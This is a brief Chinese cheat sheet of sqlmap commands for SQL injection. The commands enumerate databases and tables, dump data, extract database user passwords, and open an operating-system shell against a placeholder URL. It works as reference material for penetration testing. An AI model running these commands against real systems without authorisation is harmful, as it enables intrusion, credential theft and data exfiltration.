您好,登錄后才能下訂單哦!
SQLMAP
GET 方式的注入 sqlmap.py -u "URL"
POST 方式的注入 sqlmap.py -u "URL" --data "POST參數=POST數值"
COOKIE 方式的注入 sqlmap.py -u "URL" --cookie "cookies 值"
爆數據庫名(cookie根據實際的情況) sqlmap.py -u "URL" [--cookie "cookies 值"] --dbs
爆目標數據庫中的表 sqlmap.py -u "URL" [--cookie "cookies 值"] -D 數據庫名 --tables
爆目標數據表字段 sqlmap.py -u "URL" [--cookie "cookies 值"] -D 數據庫名 -T 表名 --columns
導出目標字段的數據 sqlmap.py -u "URL" [--cookie "cookies 值"] -D 數據庫名 -T 表名 -C 要導出數據的字段名,多個字段用逗號分隔 --dump
爆出目標庫有多少數據 sqlmap.py -u "URL" [--cookie "cookies 值"] -D 數據庫名 --count
檢測當前用戶 sqlmap.py -u "URL" [--cookie "cookies 值"] --current-user
檢測當前用戶是否管理員 sqlmap.py -u "URL" [--cookie "cookies 值"] --is-dba
檢測數據庫用戶 sqlmap.py -u "URL" [--cookie "cookies 值"] --user -v 0
檢測數據庫用戶密碼 sqlmap.py -u "URL" [--cookie "cookies 值"] --password -v 0
檢測當前數據庫 sqlmap.py -u "URL" [--cookie "cookies 值"] --current-db
多線程 -threading 5
如果是管理員,我們可以寫Shell
操作系統Shell寫入
sqlmap.py -u "URL" [--cookie "cookies 值"] --os-shell
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。